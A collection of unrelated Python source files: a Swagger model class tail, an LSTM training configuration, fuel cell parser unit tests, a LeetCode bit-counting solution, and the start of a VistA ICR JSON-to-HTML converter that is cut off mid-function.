:return: The time_zone of this PureArray. # noqa: E501
:rtype: str
"""
return self._time_zone
@time_zone.setter
def time_zone(self, time_zone):
"""Sets the time_zone of this PureArray.
:param time_zone: The time_zone of this PureArray. # noqa: E501
:type: str
"""
self._time_zone = time_zone
@property
def version(self):
"""Gets the version of this PureArray. # noqa: E501
:return: The version of this PureArray. # noqa: E501
:rtype: str
"""
return self._version
@version.setter
def version(self, version):
"""Sets the version of this PureArray.
:param version: The version of this PureArray. # noqa: E501
:type: str
"""
self._version = version
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(PureArray, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, PureArray):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
the-stack_106_23836 | from data.input_set import InputSet
from data.point import Point
class Configuration(object):
def __init__(self):
"""
path params
"""
self.PATH = "/home/alex/Documents/Project/data/FRAME_DATABASES"
self.PATH_LABELS = "/home/alex/Documents/Project/LSTM_labels/tiles"
self.DATA_SET_PATH = "../data"
self.OUTPUT_PATH = '/media/alex/Локальный диск/UBUNTU/runs/'
self.MAP_PATH = ''
"""
dataset params
"""
self.NORM_RANGE = (0, 1)
class TileType(object):
def __init__(self):
self.A = 'A'
self.B = 'B'
self.C = 'C'
self.D = 'D'
self.E = 'E'
pass
self.TILE_TYPE = TileType()
self.TILE_1_NUMBER_OF_EXAMPLES = 3618
self.TILE_1_A = InputSet(1, 465, Point(1.11, 5.68), Point(1.11, 7.69), self.TILE_TYPE.A) # y change
self.TILE_1_B = InputSet(466, 1090, Point(1.11, 7.69), Point(3.41, 7.69), self.TILE_TYPE.B) # x change
self.TILE_1_C = InputSet(1091, 2330, Point(3.41, 7.69), Point(3.41, 0.54), self.TILE_TYPE.C) # y change
self.TILE_1_D = InputSet(2331, 2700, Point(3.41, 0.54), Point(1.11, 0.54), self.TILE_TYPE.D) # x change
self.TILE_1_E = InputSet(2701, 3618, Point(1.11, 0.54), Point(1.11, 5.68), self.TILE_TYPE.E) # y change
self.TILE_2_NUMBER_OF_EXAMPLES = 3579
self.TILE_2_A = InputSet(1, 510, Point(1.11, 5.68), Point(1.11, 7.69), self.TILE_TYPE.A) # y change
self.TILE_2_B = InputSet(511, 1150, Point(1.11, 7.69), Point(3.41, 7.69), self.TILE_TYPE.B) # x change
self.TILE_2_C = InputSet(1151, 2370, Point(3.41, 7.69), Point(3.41, 0.54), self.TILE_TYPE.C) # y change
self.TILE_2_D = InputSet(2371, 2760, Point(3.41, 0.54), Point(1.11, 0.54), self.TILE_TYPE.D) # x change
self.TILE_2_E = InputSet(2761, 3579, Point(1.11, 0.54), Point(1.11, 5.68), self.TILE_TYPE.E) # y change
self.TILE_3_NUMBER_OF_EXAMPLES = 3380
self.TILE_3_A = InputSet(1, 430, Point(1.11, 5.68), Point(1.11, 7.69), self.TILE_TYPE.A) # y change
self.TILE_3_B = InputSet(431, 960, Point(1.11, 7.69), Point(3.41, 7.69), self.TILE_TYPE.B) # x change
self.TILE_3_C = InputSet(961, 2160, Point(3.41, 7.69), Point(3.41, 0.54), self.TILE_TYPE.C) # y change
self.TILE_3_D = InputSet(2161, 2540, Point(3.41, 0.54), Point(1.11, 0.54), self.TILE_TYPE.D) # x change
self.TILE_3_E = InputSet(2541, 3380, Point(1.11, 0.54), Point(1.11, 5.68), self.TILE_TYPE.E) # y change
self.TILE_4_NUMBER_OF_EXAMPLES = 3223
self.TILE_4_A = InputSet(1, 410, Point(1.11, 5.68), Point(1.11, 7.69), self.TILE_TYPE.A) # y change
self.TILE_4_B = InputSet(411, 910, Point(1.11, 7.69), Point(3.41, 7.69), self.TILE_TYPE.B) # x change
self.TILE_4_C = InputSet(911, 2080, Point(3.41, 7.69), Point(3.41, 0.54), self.TILE_TYPE.C) # y change
self.TILE_4_D = InputSet(2081, 2430, Point(3.41, 0.54), Point(1.11, 0.54), self.TILE_TYPE.D) # x change
self.TILE_4_E = InputSet(2431, 3223, Point(1.11, 0.54), Point(1.11, 5.68), self.TILE_TYPE.E) # y change
self.TILE_5_NUMBER_OF_EXAMPLES = 3068
self.TILE_5_A = InputSet(1, 400, Point(1.11, 5.68), Point(1.11, 7.69), self.TILE_TYPE.A) # y change
self.TILE_5_B = InputSet(401, 910, Point(1.11, 7.69), Point(3.41, 7.69), self.TILE_TYPE.B) # x change
self.TILE_5_C = InputSet(911, 1960, Point(3.41, 7.69), Point(3.41, 0.54), self.TILE_TYPE.C) # y change
self.TILE_5_D = InputSet(1961, 2320, Point(3.41, 0.54), Point(1.11, 0.54), self.TILE_TYPE.D) # x change
self.TILE_5_E = InputSet(2321, 3068, Point(1.11, 0.54), Point(1.11, 5.68), self.TILE_TYPE.E) # y change
self.TILE_6_NUMBER_OF_EXAMPLES = 2973
self.TILE_6_A = InputSet(1, 410, Point(1.11, 5.68), Point(1.11, 7.69), self.TILE_TYPE.A) # y change
self.TILE_6_B = InputSet(411, 910, Point(1.11, 7.69), Point(3.41, 7.69), self.TILE_TYPE.B) # x change
self.TILE_6_C = InputSet(911, 1930, Point(3.41, 7.69), Point(3.41, 0.54), self.TILE_TYPE.C) # y change
self.TILE_6_D = InputSet(1931, 2270, Point(3.41, 0.54), Point(1.11, 0.54), self.TILE_TYPE.D) # x change
self.TILE_6_E = InputSet(2271, 2973, Point(1.11, 0.54), Point(1.11, 5.68), self.TILE_TYPE.E) # y change
self.TILE_7_NUMBER_OF_EXAMPLES = 2930
self.TILE_7_A = InputSet(1, 370, Point(1.11, 5.68), Point(1.11, 7.69), self.TILE_TYPE.A) # y change
self.TILE_7_B = InputSet(371, 830, Point(1.11, 7.69), Point(3.41, 7.69), self.TILE_TYPE.B) # x change
self.TILE_7_C = InputSet(831, 1875, Point(3.41, 7.69), Point(3.41, 0.54), self.TILE_TYPE.C) # y change
self.TILE_7_D = InputSet(1876, 2200, Point(3.41, 0.54), Point(1.11, 0.54), self.TILE_TYPE.D) # x change
self.TILE_7_E = InputSet(2201, 2930, Point(1.11, 0.54), Point(1.11, 5.68), self.TILE_TYPE.E) # y change
"""
input images params
"""
class Size(object):
def __init__(self, width, height, channels):
self.WIDTH = width
self.HEIGHT = height
self.CHANNELS = channels
pass
self.IMAGE_SIZE = Size(268, 32, 3)
"""
modes params
"""
class Mode(object):
def __init__(self):
self.TRAINING = 'training'
self.VALIDATION = 'validation'
self.TESTING = 'testing'
pass
self.MODE = Mode()
"""
model params
"""
self.LEAKY_RELU_ALPHA = 0.1
self.LSTM_HIDDEN_UNITS = 512
self.LSTM_LAYERS = 2
"""
training params
"""
self.BATCH_SIZE = 100 # SEQUENCE_LENGTH
self.EPOCHS = 100000
self.LOG_PERIOD = 10 # steps
self.SAVE_PERIOD = 1000 # steps
self.MIN_FRACTION_OF_EXAMPLES_IN_QUEUE = 0.4
self.NUM_PREPROCESSING_THREADS = 16
self.NUM_EPOCHS_PER_DECAY = 1000 # Epochs after which learning rate decays.
self.INITIAL_LEARNING_RATE = 0.001
self.LEARNING_RATE_DECAY_FACTOR = 0.1
self.TARGET_LOSS = 0.001
"""
testing params
"""
self.TESTING_BATCH_SIZE = self.BATCH_SIZE # SEQUENCE_LENGTH
self.TESTING_EPOCHS = 1
self.VALIDATION_PERC = 0.2
self.TESTING_PERC = 0.1
self.TRAINING_PERC = 1 - self.VALIDATION_PERC - self.TESTING_PERC
pass
|
the-stack_106_23837 | #!/usr/bin/env python
"""
@package mi.dataset.parser.test
@file mi-dataset/mi/dataset/parser/test/test_fuelcell_eng_dcl.py
@author Chris Goodrich
@brief Test code for the fuelcell_eng_dcl parser
Release notes:
initial release
"""
__author__ = 'cgoodrich'
from mi.logging import log
import os
from nose.plugins.attrib import attr
from mi.core.exceptions import ConfigurationException
from mi.dataset.test.test_parser import ParserUnitTestCase
from mi.dataset.dataset_parser import DataSetDriverConfigKeys
from mi.dataset.parser.fuelcell_eng_dcl import FuelCellEngDclParticleClassKey,\
FuelCellEngDclDataParticleRecovered,\
FuelCellEngDclDataParticleTelemetered
from mi.dataset.parser.fuelcell_eng_dcl import FuelCellEngDclParser
from mi.idk.config import Config
RESOURCE_PATH = os.path.join(Config().base_dir(),
'mi', 'dataset', 'driver', 'fuelcell_eng', 'dcl', 'resource')
@attr('UNIT', group='mi')
class FuelCellEngDclParserUnitTestCase(ParserUnitTestCase):
"""
fuelcell_eng_dcl Parser unit test suite
"""
def setUp(self):
ParserUnitTestCase.setUp(self)
self._recovered_parser_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.fuelcell_eng_dcl',
DataSetDriverConfigKeys.PARTICLE_CLASS: None,
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {
FuelCellEngDclParticleClassKey.ENGINEERING_DATA_PARTICLE_CLASS: FuelCellEngDclDataParticleRecovered
}
}
self._telemetered_parser_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.fuelcell_eng_dcl',
DataSetDriverConfigKeys.PARTICLE_CLASS: None,
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {
FuelCellEngDclParticleClassKey.ENGINEERING_DATA_PARTICLE_CLASS: FuelCellEngDclDataParticleTelemetered
}
}
self._incomplete_parser_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.fuelcell_eng_dcl',
DataSetDriverConfigKeys.PARTICLE_CLASS: None
}
self._bad_parser_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.fuelcell_eng_dcl',
DataSetDriverConfigKeys.PARTICLE_CLASS: None,
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {}
}
def test_simple(self):
"""
Read file and verify that all expected particles can be read.
Verify that the contents of the particles are correct.
This is the happy path.
"""
log.debug('===== START TEST SIMPLE =====')
num_particles_to_request = 25
num_expected_particles = 20
# Test the recovered version
log.debug('------ RECOVERED ------')
with open(os.path.join(RESOURCE_PATH, '20141207s.pwrsys.log'), 'rU') as file_handle:
parser = FuelCellEngDclParser(self._recovered_parser_config,
file_handle,
self.exception_callback)
particles = parser.get_records(num_particles_to_request)
self.assertEquals(len(particles), num_expected_particles)
self.assert_particles(particles, 'recovered_20141207s.pwrsys.yml', RESOURCE_PATH)
# Test the telemetered version
log.debug('----- TELEMETERED -----')
with open(os.path.join(RESOURCE_PATH, '20141207s.pwrsys.log'), 'rU') as file_handle:
parser = FuelCellEngDclParser(self._telemetered_parser_config,
file_handle,
self.exception_callback)
particles = parser.get_records(num_particles_to_request)
self.assertEquals(len(particles), num_expected_particles)
self.assert_particles(particles, 'telemetered_20141207s.pwrsys.yml', RESOURCE_PATH)
log.debug('===== END TEST SIMPLE =====')
def test_bigfile(self):
"""
Read file and verify that all expected particles can be read.
Verify that the expected number of particles are produced.
Only one test is run as the content of the input files is the
same for recovered or telemetered.
"""
log.debug('===== START TEST BIGFILE =====')
num_particles_to_request = num_expected_particles = 870
with open(os.path.join(RESOURCE_PATH, '20141207.pwrsys.log'), 'rU') as file_handle:
parser = FuelCellEngDclParser(self._recovered_parser_config,
file_handle,
self.exception_callback)
particles = parser.get_records(num_particles_to_request)
self.assertEquals(len(particles), num_expected_particles)
log.debug('===== END TEST BIGFILE =====')
def test_bad_checksum(self):
"""
Read file and verify that all expected particles can be read.
There are two lines with bad checksums in the file. The checksum
after the colon is incorrect on lines 10 and 23 of the input file.
Only one test is run as the content of the input files is the
same for recovered or telemetered.
"""
log.debug('===== START TEST BAD CHECKSUM =====')
num_particles_to_request = num_expected_particles = 18
with open(os.path.join(RESOURCE_PATH, '20141207s_bcs.pwrsys.log'), 'rU') as file_handle:
parser = FuelCellEngDclParser(self._recovered_parser_config,
file_handle,
self.exception_callback)
particles = parser.get_records(num_particles_to_request)
self.assertEquals(len(particles), num_expected_particles)
log.debug('===== END TEST BAD CHECKSUM =====')
def test_badly_formed(self):
"""
Read file and verify that all expected particles can be read.
Line 1 Improperly formatted - No particle generated
Line 2 Improperly formatted - No particle generated
Line 9 - Bad checksum - No particle generated
No fuel cell data present on line 11 - No particle generated
No fuel cell data present on line 12 - No particle generated
No fuel cell data present on line 13 - No particle generated
No fuel cell data present on line 14 - No particle generated
No fuel cell data present on line 15 - No particle generated
Line 20 - Bad checksum - No particle generated
Line 24 Improperly formatted - No particle generated
Line 26 Improperly formatted - No particle generated
Line 27 Improperly formatted - No particle generated
Line 28 Bad/Missing Timestamp - No particle generated
Line 29 Bad/Missing Timestamp - No particle generated
Line 30 No data found - No particle generated
Line 31 No terminator found - No particle generated
Line 32 Improper format - No particle generated
Only one test is run as the content of the input files
is the same for recovered or telemetered.
"""
log.debug('===== START TEST BADLY FORMED =====')
num_particles_to_request = 33
num_expected_particles = 16
with open(os.path.join(RESOURCE_PATH, '20141207_badform.pwrsys.log'), 'rU') as file_handle:
parser = FuelCellEngDclParser(self._recovered_parser_config,
file_handle,
self.exception_callback)
particles = parser.get_records(num_particles_to_request)
self.assertEquals(len(particles), num_expected_particles)
log.debug('===== END TEST BADLY FORMED =====')
def test_bad_configuration(self):
"""
Attempt to build a parser with a bad configuration.
"""
log.debug('===== START TEST BAD CONFIGURATION =====')
with open(os.path.join(RESOURCE_PATH, '20141207s.pwrsys.log'), 'rU') as file_handle:
with self.assertRaises(ConfigurationException):
parser = FuelCellEngDclParser(self._bad_parser_config,
file_handle,
self.exception_callback)
log.debug('===== END TEST BAD CONFIGURATION =====')
def test_partial_configuration(self):
"""
Attempt to build a parser with a bad configuration.
"""
log.debug('===== START TEST PARTIAL CONFIGURATION =====')
with open(os.path.join(RESOURCE_PATH, '20141207s.pwrsys.log'), 'rU') as file_handle:
with self.assertRaises(ConfigurationException):
parser = FuelCellEngDclParser(self._incomplete_parser_config,
file_handle,
self.exception_callback)
log.debug('===== END TEST PARTIAL CONFIGURATION =====')
def test_blank_line(self):
"""
Read file and verify that all expected particles can be read.
Verify that the contents of the particles are correct. There are
blank lines interspersed in the file. This test verifies that
these blank lines do not adversely affect the parser. Only one
test is run as the content of the input files is the same for
recovered or telemetered.
"""
log.debug('===== START TEST BLANK LINE =====')
num_particles_to_request = 25
num_expected_particles = 20
with open(os.path.join(RESOURCE_PATH, '20141207sbl.pwrsys.log'), 'rU') as file_handle:
parser = FuelCellEngDclParser(self._recovered_parser_config,
file_handle,
self.exception_callback)
particles = parser.get_records(num_particles_to_request)
self.assertEquals(len(particles), num_expected_particles)
log.debug('===== END TEST BLANK LINE =====')
|
the-stack_106_23838 | ## https://leetcode.com/problems/counting-bits/
## for every number between 0 and N, count up the
## number of 1-bits in that number. I briefly tried
## writing this up more intelligently by iterating
## a number in binary up to N, but it wasn't quite
## working and it turns out the simple way (using
## built in base conversion) is fast enoguh (25th
## percentile in runtime and 64rd in memory).
class Solution:
def add_one_to_binary(self, num):
return f'{int(num, 2) + 1:b}'
def countBits(self, num: int) -> List[int]:
number = '0'
output = [0]
for ii in range(1, num+1):
number = self.add_one_to_binary(number)
output.append(number.count('1'))
return output |
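# Illustrative check (not part of the submitted solution):
#   Solution().countBits(5) -> [0, 1, 1, 2, 1, 2]
# since 0b0, 0b1, 0b10, 0b11, 0b100, 0b101 contain 0, 1, 1, 2, 1, 2 set bits.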
the-stack_106_23840 | import mock
from pika import spec
from pika import frame
import time
CHANNEL = mock.Mock('pika.channel.Channel')
METHOD = spec.Basic.Deliver('ctag0', 1, False, 'exchange', 'routing_key')
PROPERTIES = spec.BasicProperties(content_type='application/json',
content_encoding='qux',
headers={'foo': 'bar', 'baz': 1},
delivery_mode=2,
priority=5,
correlation_id='c123',
reply_to='rtrk',
expiration='32768',
message_id='mid123',
timestamp=time.time(),
type='test',
user_id='foo',
app_id='bar')
BODY = '{"qux": true, "foo": "bar", "baz": 1}'
class MockConsumer(object):
def __init__(self, configuration):
"""Creates a new instance of a Mock Consumer class. To perform
initialization tasks, extend Consumer._initialize
:param dict configuration: The configuration from rejected
"""
# Carry the configuration for use elsewhere
self._configuration = configuration
|
the-stack_106_23841 | # Copyright 2010-2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# This file is licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License. A copy of the
# License is located at
#
# http://aws.amazon.com/apache2.0/
#
# This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import boto3
from botocore.exceptions import ClientError
ec2 = boto3.client('ec2')
try:
ec2.reboot_instances(InstanceIds=['INSTANCE_ID'], DryRun=True)
except ClientError as e:
if 'DryRunOperation' not in str(e):
print("You don't have permission to reboot instances.")
raise
try:
response = ec2.reboot_instances(InstanceIds=['INSTANCE_ID'], DryRun=False)
print('Success', response)
except ClientError as e:
print('Error', e)
#snippet-sourcedescription:[rebooting.py demonstrates how to request a reboot of one or more Amazon EC2 instances.]
#snippet-keyword:[Python]
#snippet-keyword:[AWS SDK for Python (Boto3)]
#snippet-keyword:[Code Sample]
#snippet-keyword:[Amazon EC2]
#snippet-service:[ec2]
#snippet-sourcetype:[full-example]
#snippet-sourcedate:[2018-06-25]
#snippet-sourceauthor:[jschwarzwalder]
|
the-stack_106_23845 | #!/usr/bin/env python3
def gen_uv(width, height, scale=1.0):
w_inv = 1.0 / width
h_inv = 1.0 / height
uv = []
for h in range(height):
for w in range(width):
u = (w + 0.5) * w_inv * scale
v = (h + 0.5) * h_inv * scale
uv.append((u, v))
return uv
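# Illustrative example (values worked out by hand for this sketch):
#   gen_uv(2, 2) -> [(0.25, 0.25), (0.75, 0.25), (0.25, 0.75), (0.75, 0.75)]
# i.e. texel-center UV coordinates for a 2x2 texture with scale=1.0.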
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("size", type=int, help="size of a texture. power of 2")
args = parser.parse_args()
uvs = gen_uv(args.size, args.size)
for uv in uvs:
print('{0[0]} {0[1]}'.format(uv))
|
the-stack_106_23846 | """ This module is going to parse ICR in JSON format and convert to html web page
"""
import json
import argparse
import os.path
import cgi
import logging
import pprint
from LogManager import logger, initConsoleLogging
from ICRSchema import ICR_FILE_KEYWORDS_LIST, SUBFILE_FIELDS
from ICRSchema import isSubFile, isWordProcessingField
from WebPageGenerator import getPackageHtmlFileName, getGlobalHtmlFileNameByName
from WebPageGenerator import getRoutineHtmlFileName
from DataTableHtml import outputDataTableHeader, outputDataTableFooter
from DataTableHtml import writeTableListInfo, outputDataListTableHeader
from DataTableHtml import outputLargeDataListTableHeader, outputDataRecordTableHeader
from DataTableHtml import outputFileEntryTableList, safeElementId
from InitCrossReferenceGenerator import createInitialCrossRefGenArgParser
from InitCrossReferenceGenerator import parseCrossRefGeneratorWithArgs
from FileManGlobalDataParser import generateSingleFileFieldToIenMappingBySchema
dox_url = "http://code.osehra.org/dox/"
pkgMap = {
'AUTOMATED INFO COLLECTION SYS': 'Automated Information Collection System',
'AUTOMATED MED INFO EXCHANGE': 'Automated Medical Information Exchange',
'BAR CODE MED ADMIN': 'Barcode Medication Administration',
'CLINICAL INFO RESOURCE NETWORK': 'Clinical Information Resource Network',
# u'DEVICE HANDLER',
# u'DISCHARGE SUMMARY',
'E CLAIMS MGMT ENGINE': 'E Claims Management Engine',
# u'EDUCATION TRACKING',
'EMERGENCY DEPARTMENT': 'Emergency Department Integration Software',
# u'EXTENSIBLE EDITOR',
# u'EXTERNAL PEER REVIEW',
'FEE BASIS CLAIMS SYSTEM' : 'Fee Basis',
'GEN. MED. REC. - GENERATOR': 'General Medical Record - Generator',
'GEN. MED. REC. - I/O' : 'General Medical Record - IO',
'GEN. MED. REC. - VITALS' : 'General Medical Record - Vitals',
# u'GRECC',
# u'HEALTH MANAGEMENT PLATFORM',
# u'INDIAN HEALTH SERVICE',
# u'INSURANCE CAPTURE BUFFER',
# u'IV PHARMACY',
# u'MASTER PATIENT INDEX',
'MCCR BACKBILLING' : 'MCCR National Database - Field',
# u'MINIMAL PATIENT DATASET',
# u'MOBILE SCHEDULING APPLICATIONS SUITE',
# u'Missing Patient Register',
'NATIONAL HEALTH INFO NETWORK' : 'National Health Information Network',
# u'NEW PERSON',
# u'PATIENT ASSESSMENT DOCUM',
# u'PATIENT FILE',
# u'PROGRESS NOTES',
# u'QUALITY ASSURANCE',
# u'QUALITY IMPROVEMENT CHECKLIST',
# u'REAL TIME LOCATION SYSTEM',
'TEXT INTEGRATION UTILITIES' : 'Text Integration Utility',
# u'UNIT DOSE PHARMACY',
'VA POINT OF SERVICE (KIOSKS)' : 'VA Point of Service',
# u'VDEM',
'VISTA INTEGRATION ADAPTOR' : 'VistA Integration Adapter',
'VENDOR - DOCUMENT STORAGE SYS' : 'Vendor - Document Storage Systems'
# u'VETERANS ADMINISTRATION',
# u'VOLUNTARY SERVICE SYSTEM',
# u'VPFS',
# u'cds',
# u'person.demographics',
# u'person.lookup',
# u'term',
# u'term.access'])
} # this is the mapping between CUSTODIAL PACKAGE and packages in Dox
def normalizeName(name):
return name.replace('/', ' ').replace('\'','').replace(',','').replace('.','').replace('&', 'and')
def useAjaxDataTable(len):
return len > 4000 # if has more than 4000 entries, use ajax approach
pgkUpperCaseNameDict = dict()
rpcNameToIenMapping = dict()
RPC_FILE_NO = '8994'
RPC_NAME_FIELD_NO = '.01'
def addToPackageMap(icrEntry, pkgName):
if 'CUSTODIAL PACKAGE' in icrEntry:
icrPkg = icrEntry['CUSTODIAL PACKAGE']
if icrPkg not in pkgMap:
pkgMap[icrPkg] = pkgName
logger.debug('[%s] ==> [%s]', icrPkg, pkgName)
elif pkgMap[icrPkg] != pkgName:
logger.debug('[%s] mapped to [%s] and [%s]', icrPkg, pkgMap[icrPkg], pkgName)
""" Util function to generate link for the fie """
def getICRIndividualHtmlFileLinkByIen(value, icrEntry, **kargs):
ien = icrEntry['NUMBER']
return '<a href=\"%s\">%s</a>' % ('ICR-' + ien + '.html', value)
def getPackageHRefLink(pkgName, icrEntry, **kargs):
if pkgName in pkgMap:
pkgLink = getPackageHtmlFileName(pkgMap[pkgName])
return '<a href=\"%s%s\">%s</a>' % (dox_url, pkgLink , pkgName)
crossRef = None
if 'crossRef' in kargs:
crossRef = kargs['crossRef']
if crossRef:
if len(pgkUpperCaseNameDict) == 0 :
for name in crossRef.getAllPackages().iterkeys():
pgkUpperCaseNameDict[name.upper()] = name
upperName = normalizeName(pkgName).upper()
if upperName in pgkUpperCaseNameDict:
addToPackageMap(icrEntry, pgkUpperCaseNameDict[upperName])
return '<a href=\"%s%s\">%s</a>' % (dox_url, getPackageHtmlFileName(pgkUpperCaseNameDict[upperName]) , pkgName)
pkg = crossRef.getPackageByName(pkgName)
if not pkg:
pkgRename = normalizeName(pkgName).title()
# logger.warn('[%s] renamed as [%s]', pkgName, pkgRename)
pkg = crossRef.getPackageByName(pkgRename)
if not pkg:
pkgRename = normalizeName(pkgName)
pkg = crossRef.getPackageByName(pkgRename)
if pkg:
addToPackageMap(icrEntry, pkg.getName())
pkgLink = getPackageHtmlFileName(pkg.getName())
return '<a href=\"%s%s\">%s</a>' % (dox_url, pkgLink , pkgName)
else:
logger.warn('Can not find mapping for package: [%s]', pkgName)
return pkgName
def getFileManFileHRefLink(fileNo, icrEntry, **kargs):
crossRef = None
if 'crossRef' in kargs:
crossRef = kargs['crossRef']
if crossRef:
fileInfo = crossRef.getGlobalByFileNo(fileNo)
if fileInfo:
linkName = getGlobalHtmlFileNameByName(fileInfo.getName())
logger.debug('link is [%s]', linkName)
# addToPackageMap(icrEntry, fileInfo.getPackage().getName())
return '<a href=\"%s%s\">%s</a>' % (dox_url, linkName, fileNo)
else:
logger.debug('Can not find file: [%s]', fileNo)
return fileNo
def getRoutineHRefLink(rtnName, icrEntry, **kargs):
crossRef = None
if 'crossRef' in kargs:
crossRef = kargs['crossRef']
if crossRef:
routine = crossRef.getRoutineByName(rtnName)
if routine:
logger.debug('Routine Name is %s, package: %s', routine.getName(), routine.getPackage())
# addToPackageMap(icrEntry, routine.getPackage().getName())
return '<a href=\"%s%s\">%s</a>' % (dox_url, getRoutineHtmlFileName(routine.getName()), rtnName)
else:
logger.debug('Can not find routine [%s]', rtnName)
logger.debug('After Categorization: routine: [%s], info: [%s]', rtnName, crossRef.categorizeRoutineByNamespace(rtnName))
return rtnName
def getRPCHRefLink(rpcName, icrEntry, **kargs):
if rpcName in rpcNameToIenMapping:
rpcFilename = '%s-%s.html' % (RPC_FILE_NO, rpcNameToIenMapping[rpcName])
return '<a href=\"%s\">%s</a>' % (rpcFilename, rpcName)
return rpcName
""" A list of fields that are part of the summary page for each package or all """
summary_list_fields = [
('IA #', 'NUMBER', None),
('Name', None, getICRIndividualHtmlFileLinkByIen),
('Type', None, None),
('Custodial Package', None, getPackageHRefLink),
# ('Custodial ISC', None),
('Date Created', None, None),
('DBIC Approval Status', None, None),
('Status', None, None),
('Usage', None, None),
('File #', 'FILE NUMBER', getFileManFileHRefLink),
# ('Global root', None, None),
('Remote Procedure', None, getRPCHRefLink),
('Routine', None, getRoutineHRefLink),
('Date Activated', None, None)
]
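# Note added for clarity (not in the original source): each tuple in summary_list_fields is
# (column header, alternate JSON key, link-conversion callback). When the middle entry is None,
# the upper-cased column header is used as the key into the ICR entry; when the callback is not
# None it wraps the raw value in an HTML href, e.g. ('File #', 'FILE NUMBER', getFileManFileHRefLink)
# renders the file number as a link to the matching global page.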
field_convert_map = {
'FILE NUMBER': getFileManFileHRefLink,
'ROUTINE': getRoutineHRefLink,
'CUSTODIAL PACKAGE': getPackageHRefLink,
'SUBSCRIBING PACKAGE': getPackageHRefLink,
'REMOTE PROCEDURE': getRPCHRefLink
}
class ICRJsonToHtml(object):
def __init__(self, crossRef, outDir):
self._crossRef = crossRef
self._outDir = outDir
"""
This is the entry point to convert JSON to html web pages
It will generate a total ICR summary page as well individual pages for each package.
It will also generate the pages for each individual ICR details
"""
def converJsonToHtml(self, inputJsonFile):
with open(inputJsonFile, 'r') as inputFile:
inputJson = json.load(inputFile)
self._generateICRSummaryPage(inputJson)
""" Utility function to convert icrEntry to summary info """
def _convertICREntryToSummaryInfo(self, icrEntry):
summaryInfo = [""]*len(summary_list_fields)
for idx, id in enumerate(summary_list_fields):
if id[1] and id[1] in icrEntry:
summaryInfo[idx] = icrEntry[id[1]]
elif id[0].upper() in icrEntry:
summaryInfo[idx] = icrEntry[id[0].upper()]
if summaryInfo[idx] and id[2]:
summaryInfo[idx] = id[2](summaryInfo[idx], icrEntry, crossRef=self._crossRef)
return summaryInfo
""" Summary page will contain summary information
"""
def _generateICRSummaryPage(self, inputJson):
pkgJson = {} # group by package
allpgkJson = []
for icrEntry in inputJson:
self._generateICRIndividualPage(icrEntry)
summaryInfo = self._convertICREntryToSummaryInfo(icrEntry)
allpgkJson.append(summaryInfo)
if 'CUSTODIAL PACKAGE' in icrEntry:
pkgJson.setdefault(icrEntry['CUSTODIAL PACKAGE'],[]).append(summaryInfo)
self._generateICRSummaryPageImpl(allpgkJson, 'ICR List', 'All', True)
for pkgName, outJson in pkgJson.iteritems():
self._generateICRSummaryPageImpl(outJson, 'ICR List', pkgName)
logger.warn('Total # entry in pkgMap is [%s]', len(pkgMap))
logger.warn('Total # entry in pkgJson is [%s]', len(pkgJson))
pprint.pprint(set(pkgJson.keys()) - set(pkgMap.keys()))
pprint.pprint(set(pgkUpperCaseNameDict.values()) - set(pkgMap.values()))
# pprint.pprint(pkgMap)
self._generatePkgDepSummaryPage(inputJson)
def _generatePkgDepSummaryPage(self, inputJson):
outDep = {}
for icrItem in inputJson:
curIaNum = icrItem['IA #']
# ignore the non-active icrs
if 'STATUS' not in icrItem or icrItem['STATUS'] != 'Active':
continue
if 'CUSTODIAL PACKAGE' in icrItem:
curPkg = icrItem['CUSTODIAL PACKAGE']
outDep.setdefault(curPkg,{})
if 'SUBSCRIBING PACKAGE' in icrItem:
for subPkg in icrItem['SUBSCRIBING PACKAGE']:
if 'SUBSCRIBING PACKAGE' in subPkg:
subPkgName = subPkg['SUBSCRIBING PACKAGE']
if isinstance(subPkgName,list):
for subPkgNameEntry in subPkgName:
subDep = outDep.setdefault(subPkgNameEntry, {}).setdefault('dependencies',{})
subDep.setdefault(curPkg, []).append(curIaNum)
curDep = outDep.setdefault(curPkg, {}).setdefault('dependents', {})
curDep.setdefault(subPkgNameEntry, []).append(curIaNum)
else:
subDep = outDep.setdefault(subPkgName, {}).setdefault('dependencies',{})
subDep.setdefault(curPkg, []).append(curIaNum)
curDep = outDep.setdefault(curPkg, {}).setdefault('dependents', {})
curDep.setdefault(subPkgName, []).append(curIaNum)
""" Convert outDep to html page """
outDir = self._outDir
outFilename = "%s/ICR-PackageDep.html" % outDir
with open(outFilename, 'w+') as output:
output.write("<html>\n")
tName = safeElementId("%s-%s" % ('ICR', 'PackageDep'))
outputDataListTableHeader(output, tName)
output.write("<body id=\"dt_example\">")
output.write("""<div id="container" style="width:80%">""")
outputDataTableHeader(output, ['Package Name', 'Dependencies Information'], tName)
""" table body """
output.write("<tbody>\n")
""" Now convert the ICR Data to Table data """
for pkgName in sorted(outDep.iterkeys()):
output.write("<tr>\n")
